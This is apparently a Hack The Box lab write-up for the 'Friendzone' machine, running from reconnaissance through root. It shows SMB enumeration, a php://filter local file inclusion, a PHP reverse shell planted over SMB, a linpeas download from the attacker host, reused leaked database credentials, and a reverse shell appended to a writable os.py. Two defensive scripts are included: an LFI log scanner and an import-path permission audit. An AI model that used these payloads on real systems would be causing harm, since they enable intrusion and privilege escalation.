Friendzone

Introduction:
Friendzone needs a good amount of enumeration of its ports and services: many services are running, and many application endpoints look interesting at first but turn out to be rabbit holes. The privesc involves library hijacking of a Python library that was left with incorrect, writable permissions.
Recon
Nmap scan:
eneloop@kinetic:.../hackthebox/friendzone/data$ sudo nmap -sS -sV -sC -T4 -O -oN nmap.friendzone.txt 10.10.10.123
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 13:23 EST
Nmap scan report for 10.10.10.123
Host is up (0.015s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/28%OT=21%CT=1%CU=37630%PV=Y%DS=2%DC=I%G=Y%TM=603BDFA
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=1
OS:03%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T7(R=N)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -30m45s, deviation: 1h09m16s, median: 9m13s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2021-02-28T20:32:48+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-28T18:32:48
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds
Notes:
- The SSL certificate's common name is friendzone.red; add it to /etc/hosts.
- FTP is vsftpd 3.0.3.
- DNS is ISC BIND 9.11.3-1ubuntu1.2.
- The web server is Apache httpd 2.4.29.
- SMB is Samba smbd 4.7.6-Ubuntu.
Enumeration
Enumerate the SMB shares on the target using enum4linux -
eneloop@kinetic:.../hackthebox/friendzone/data$ enum4linux -S -d 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 28 20:20:19 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.123
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.123    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

 =====================================
|    Session Check on 10.10.10.123    |
 =====================================
[+] Server 10.10.10.123 allows sessions using username '', password ''

 ===========================================
|    Getting domain SID for 10.10.10.123    |
 ===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 =========================================
|    Share Enumeration on 10.10.10.123    |
 =========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$        Mapping: DENIED, Listing: N/A
//10.10.10.123/Files         Mapping: DENIED, Listing: N/A
//10.10.10.123/general       Mapping: OK, Listing: OK
//10.10.10.123/Development   Mapping: OK, Listing: OK
//10.10.10.123/IPC$          [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Feb 28 20:20:20 2021
It looks like we can read from two of the SMB shares (general and Development) and, as verified next, write to one of them. The general share holds a creds.txt, but we don't yet know where those credentials are used.
eneloop@kinetic:.../hackthebox/friendzone/data$ smbclient //10.10.10.123/general
Enter WORKGROUP\eneloop's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

                9221460 blocks of size 1024. 6419736 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \>
Let's validate that we can write to the Development share by uploading an empty file -
eneloop@kinetic:.../hackthebox/friendzone/data$ smbclient //10.10.10.123/Development
Enter WORKGROUP\eneloop's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 28 13:43:05 2021
  ..                                  D        0  Wed Jan 23 16:51:02 2019

                9221460 blocks of size 1024. 6419672 blocks available
smb: \> put test.html
putting file test.html as \test.html (0.3 kb/s) (average 0.3 kb/s)
smb: \>
https://friendzone.red takes us to a static website with a GIF, but the page source reveals a /js/js/ subdirectory.
https://friendzone.red/js/js/

REQUEST:

GET /js/js/ HTTP/1.1
Host: friendzone.red
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zonedman=justgotzoned
Upgrade-Insecure-Requests: 1

RESPONSE:
HTTP/1.1 200 OK
Date: Mon, 01 Mar 2021 02:20:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: zonedman=justgotzoned; expires=Mon, 01-Mar-2021 03:20:13 GMT; Max-Age=3600
Vary: Accept-Encoding
Content-Length: 198
Connection: close
Content-Type: text/html; charset=UTF-8

<p>Testing some functions !</p><p>I'am trying not to break things !</p>cWQ2c3pjem9GbzE2MTQ1NjUyMTNOMm1kb0ZKS0p5<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
Nothing interesting is happening here; it just looks like a rabbit hole. Let's move on -
Zone transfer
eneloop@kinetic:.../hackthebox/friendzone/data$ dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.16.8-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.                604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                604800  IN  AAAA  ::1
friendzone.red.                604800  IN  NS    localhost.
friendzone.red.                604800  IN  A     127.0.0.1
administrator1.friendzone.red. 604800  IN  A     127.0.0.1
hr.friendzone.red.             604800  IN  A     127.0.0.1
uploads.friendzone.red.        604800  IN  A     127.0.0.1
friendzone.red.                604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 15 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sun Feb 28 21:20:31 EST 2021
;; XFR size: 8 records (messages 1, bytes 289)



Visit https://administrator1.friendzone.red and you will see a login page. Log in with the credentials from creds.txt and the page responds with “Login Done ! visit /dashboard.php”.

Also, if you visit https://uploads.friendzone.red/ you will be able to upload files.

Since the server runs PHP, let's create a reverse shell, rename it to shell.png.php and upload it. The server responds with a Unix timestamp:
Uploaded successfully !
1614652642
Now we can go back to the dashboard page and pass that image name and timestamp as parameters to see whether the server will run our PHP script, which should send a reverse shell back to a listener on our attack machine.
Start Burp Suite and reload the dashboard page so we can manipulate the requests. The pagename parameter behaves like a file include, so these are the requests tried -
- https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
- https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login
- https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp
- the same wrapper against the upload script: php://filter/convert.base64-encode/resource=../uploads/upload
The php://filter wrapper returns the source base64-encoded, which we decode locally:
eneloop@kinetic:~$ echo -n PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo | base64 -d
<?php
$time_final = time() + 3600;
echo "Final Access timestamp is $time_final";
?>
milind@lindex:~$ echo -n PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K | base64 -d
<?php

// not finished yet -- friendzone admin !

if(isset($_POST["image"])){

echo "Uploaded successfully !<br>";
echo time()+3600;
}else{

echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";

}

?>
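As an added detection example (not part of the write-up), the scanner below runs over constructed Apache access-log lines modelled on the requests above and flags pagename values that are stream wrappers, absolute paths or traversal sequences rather than plain page names; the log lines and the INCLUDE_PARAMS name are assumptions made for this demo.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined-log request field: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)   # php:, data:, expect:, phar: ...
SAFE_PAGE_RE = re.compile(r"^[A-Za-z0-9_\-]+$")           # what a legitimate page name looks like
INCLUDE_PARAMS = ("pagename",)   # dashboard.php's include parameter (assumed name for the demo)


def classify(value):
    """Return why an include-parameter value is suspicious, or None if it is clean."""
    v = unquote(value)              # parse_qs decoded once; a second pass catches double encoding
    if "\x00" in v:
        return "null byte"
    if WRAPPER_RE.match(v):
        return "stream wrapper " + v.split(":", 1)[0].lower() + "://"
    if v.startswith(("/", "\\")):
        return "absolute path"
    if ".." in v.replace("\\", "/").split("/"):
        return "directory traversal"
    if not SAFE_PAGE_RE.match(v):
        return "unexpected characters"
    return None


def scan(lines):
    """Return (line_number, param, raw_value, reason) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for param in INCLUDE_PARAMS:
            for value in query.get(param, []):
                reason = classify(value)
                if reason:
                    hits.append((n, param, value, reason))
    return hits


# Constructed log lines modelled on the requests in the write-up (not real server logs).
SAMPLE_LOG = [
    '10.10.14.38 - - [01/Mar/2021:02:20:13 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 198 "-" "Mozilla/5.0"',
    '10.10.14.38 - - [01/Mar/2021:02:21:40 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '10.10.14.38 - - [02/Mar/2021:21:06:10 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.38 - - [02/Mar/2021:21:07:02 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=..%2F..%2Fuploads%2Fupload HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.38 - - [02/Mar/2021:21:08:15 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=login HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, param, value, reason in scan(SAMPLE_LOG):
        print("line %d: %s=%s  [%s]" % (n, param, value, reason))
```

Only lines 2, 3 and 4 of the sample are reported; the plain page names on lines 1 and 5 pass the allowlist pattern.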
Exploitation
So the upload script is useless, since it doesn't actually save anything, but we have found an LFI in dashboard.php and we can write files to the target over SMB!
Let's upload a PHP reverse shell to the Development share and include it through the LFI -
Prepare shell
eneloop@kinetic:.../tools/reverse-shell/php$ head -15 shell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.38'; // CHANGE THIS
$port = 4455; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

Upload shell
eneloop@kinetic:.../tools/reverse-shell/php$ smbclient //10.10.10.123/Development
Enter WORKGROUP\eneloop's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 15:03:49 2019
  ..                                  D        0  Wed Jan 23 16:51:02 2019

                9221460 blocks of size 1024. 6418784 blocks available
smb: \> put shell.php
putting file shell.php as \shell.php (63.8 kb/s) (average 63.8 kb/s)
smb: \> ls
  .                                   D        0  Tue Mar  2 21:05:06 2021
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  shell.php                           A     3460  Tue Mar  2 21:05:06 2021

                9221460 blocks of size 1024. 6418780 blocks available
smb: \>
Access shell
eneloop@kinetic:.../tools/reverse-shell/php$ echo -n <base64 body returned by the LFI, elided> | base64 -d | head -15
base64: invalid input
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.38'; // CHANGE THIS
$port = 4455; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//
eneloop@kinetic:.../tools/reverse-shell/php$
Now visit https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell (no .php in the value: the include appends the extension itself, which is why pagename=timestamp resolved to timestamp.php earlier).
Start local listener
eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 4455
listening on [any] 4455 ...



connect to [10.10.14.38] from (UNKNOWN) [10.10.10.123] 42356
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 04:07:57 up 26 min,  0 users,  load average: 0.00, 0.02, 0.15
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ $ $ $ who
/bin/sh: 4: who: not found
$ ls -l
total 434900
drwxr-xr-x   2 root root      4096 Oct  5  2018 bin
drwxr-xr-x   3 root root      4096 Oct  5  2018 boot
drwxr-xr-x  18 root root      3880 Mar  3 03:41 dev
drwxr-xr-x  90 root root      4096 Jan 23  2019 etc
drwxr-xr-x   3 root root      4096 Oct  5  2018 home
lrwxrwxrwx   1 root root        33 Oct  5  2018 initrd.img -> boot/initrd.img-4.15.0-36-generic
lrwxrwxrwx   1 root root        33 Oct  5  2018 initrd.img.old -> boot/initrd.img-4.15.0-36-generic
drwxr-xr-x  18 root root      4096 Jan 23  2019 lib
drwxr-xr-x   2 root root      4096 Oct  5  2018 lib64
drwx------   2 root root     16384 Oct  5  2018 lost+found
drwxr-xr-x   2 root root      4096 Oct  5  2018 media
drwxr-xr-x   2 root root      4096 Oct  5  2018 mnt
drwxr-xr-x   3 root root      4096 Oct  6  2018 opt
dr-xr-xr-x 100 root root         0 Mar  3 03:41 proc
drwx------   6 root root      4096 Jan 24  2019 root
drwxr-xr-x  24 root root       640 Mar  3 03:41 run
drwxr-xr-x   2 root root      4096 Jan 23  2019 sbin
drwxr-xr-x   3 root root      4096 Oct  5  2018 srv
-rw-------   1 root root 445255680 Oct  5  2018 swapfile
dr-xr-xr-x  13 root root         0 Mar  3 03:41 sys
drwxrwxrwt   2 root root      4096 Mar  3 03:41 tmp
drwxr-xr-x  10 root root      4096 Oct  5  2018 usr
drwxr-xr-x  12 root root      4096 Oct  6  2018 var
lrwxrwxrwx   1 root root        30 Oct  5  2018 vmlinuz -> boot/vmlinuz-4.15.0-36-generic
lrwxrwxrwx   1 root root        30 Oct  5  2018 vmlinuz.old -> boot/vmlinuz-4.15.0-36-generic
$ hostname
FriendZone
$
Now we have a shell on the machine as www-data!
Post-exploit/PrivEsc
eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.123] 42394
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 04:09:52 up 28 min,  0 users,  load average: 0.00, 0.01, 0.13
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python --version
Python 2.7.15rc1
$ ls -l /home/
total 4
drwxr-xr-x 5 friend friend 4096 Jan 24  2019 friend
$ ls -l /home/friend/
total 4
-r--r--r-- 1 root root 33 Oct  6  2018 user.txt
$
Linpeas
$ curl http://10.10.14.38:8000/linpeas.sh| bash
/bin/sh: 6: curl: not found
$ cd /tmp
$ wget http://10.10.14.38:8000/linpeas.sh
--2021-03-03 04:12:22--  http://10.10.14.38:8000/linpeas.sh
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 313316 (306K) [text/x-sh]
Saving to: 'linpeas.sh'

     0K .......... .......... .......... .......... .......... 16% 1.85M 0s
    50K .......... .......... .......... .......... .......... 32% 3.03M 0s
   100K .......... .......... .......... .......... .......... 49% 4.78M 0s
   150K .......... .......... .......... .......... .......... 65% 5.69M 0s
   200K .......... .......... .......... .......... .......... 81% 5.91M 0s
   250K .......... .......... .......... .......... .......... 98% 6.82M 0s
   300K .....                                                 100% 7.05M=0.08s

2021-03-03 04:12:23 (3.85 MB/s) - 'linpeas.sh' saved [313316/313316]

$ chmod 755 linpeas.sh
$ ./linpeas.sh


$ cd /var/www/
$ ls
admin
friendzone
friendzoneportal
friendzoneportaladmin
html
mysql_data.conf
uploads
$ cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ
Let's see if these credentials also work for the local user “friend” -
$ su friend
su: must be run from a terminal
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@FriendZone:/var/www$ su - friend
su - friend
Password: Agpyu12!0.213$

friend@FriendZone:~$
Linpeas also reveals liberal permissions on os.py, and you can clearly see that it was tampered with. At this point I wasn't sure how to exploit it, as I could not find any script in the obvious places or any scheduled jobs. But I had a hunch that there had to be a Python script calling the os module that might lead to a privesc, so I searched for all the Python scripts in /root, /home and /usr (I skipped /opt as it has lots of Python modules/apps installed and gave false positives).
www-data@FriendZone:/var/www$ find / -name *.py -exec ls -l {} \; 2>/dev/null | grep -v '/usr/'
<.py -exec ls -l {} \; 2>/dev/null | grep -v '/usr/'
-rw-r--r-- 1 root root 155 Apr  1  2018 /etc/python3.6/sitecustomize.py
-rwxr-xr-x 1 root root 155 Apr 16  2018 /etc/python2.7/sitecustomize.py
-rwxr--r-- 1 root root 424 Jan 16  2019 /opt/server_admin/reporter.py
www-data@FriendZone:/var/www$
/opt/server_admin/reporter.py stood out, so let's inspect it further -
friend@FriendZone:/opt/server_admin$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "[email protected]"
from_address = "[email protected]"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to [email protected] -from [email protected] -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
We cannot modify the script, but we sure can run it, and it imports the os module whose os.py is writable. Let's see if we can exploit this by appending a reverse shell to the bottom of the os library.
Library hijack
friend@FriendZone:/opt/server_admin$ tail -30 /usr/lib/python2.7/os.py
    (type, args) = sr.__reduce__()
    return (_make_stat_result, args)

try:
    _copy_reg.pickle(stat_result, _pickle_stat_result, _make_stat_result)
except NameError: # stat_result may not exist
    pass

def _make_statvfs_result(tup, dict):
    return statvfs_result(tup, dict)

def _pickle_statvfs_result(sr):
    (type, args) = sr.__reduce__()
    return (_make_statvfs_result, args)

try:
    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
                     _make_statvfs_result)
except NameError: # statvfs_result may not exist
    pass


import socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.38",5555))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
friend@FriendZone:/opt/server_admin$
Start listener and get root
eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.123] 33194
root@FriendZone:~#
root@FriendZone:~# ls
ls
certs  root.txt
root@FriendZone:~# cat root.txt
cat root.txt
b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXc7
root@FriendZone:~#
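As an added defensive check (not code from the write-up), the audit below walks a Python import path and reports modules or directories that a non-root user could modify, which is the condition that made the os.py hijack above possible. The sample tree it builds under a temp directory is constructed for the demo; mode_writable_by_others, audit_import_path and demo are names chosen here.

```python
import os
import stat
import sys
import tempfile


def mode_writable_by_others(mode):
    """True if the group or world write bit is set (POSIX ACLs are not considered)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_import_path(search_path, trusted_uids=(0,)):
    """Walk every directory on search_path and return (path, reason) pairs for
    anything an unprivileged user could alter: a directory where a new .py or
    .pth could be dropped, or a module/bytecode file that is writable or owned
    by an untrusted uid (on FriendZone, /usr/lib/python2.7/os.py was writable,
    so a payload could simply be appended to it)."""
    findings, seen = [], set()
    for base in search_path:
        base = os.path.realpath(base or ".")      # '' on sys.path means the cwd
        if base in seen or not os.path.isdir(base):
            continue
        seen.add(base)
        for root, _dirs, files in os.walk(base):
            candidates = [root] + [os.path.join(root, f) for f in files
                                   if f.endswith((".py", ".pyc", ".pth", ".so"))]
            for path in candidates:
                try:
                    st = os.stat(path)
                except OSError:                    # dangling symlink, removed mid-walk
                    continue
                kind = "directory" if stat.S_ISDIR(st.st_mode) else "module"
                if st.st_uid not in trusted_uids:
                    findings.append((path, "%s owned by uid %d" % (kind, st.st_uid)))
                elif mode_writable_by_others(st.st_mode):
                    findings.append((path, "writable " + kind))
    return findings


def demo():
    """Constructed sample tree, not a real interpreter: an os.py left mode 0666
    (as on FriendZone) beside a correctly permissioned stat.py. The tree is
    owned by the current user, so that uid is passed as trusted."""
    lib = os.path.join(tempfile.mkdtemp(prefix="pylib_audit_"), "python2.7")
    os.mkdir(lib, 0o755)
    for name, mode in (("os.py", 0o666), ("stat.py", 0o644)):
        path = os.path.join(lib, name)
        with open(path, "w") as fh:
            fh.write("# constructed stub\n")
        os.chmod(path, mode)
    return audit_import_path([lib], trusted_uids=(os.getuid(),))


if __name__ == "__main__":
    # Real use: audit the running interpreter's own import path with root as the only trusted owner.
    for path, reason in audit_import_path(sys.path):
        print("%-28s %s" % (reason, path))
    print(demo())
```

On the sample tree only os.py is reported, as "writable module"; running the script as root against sys.path on a production host should report nothing.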
Notes: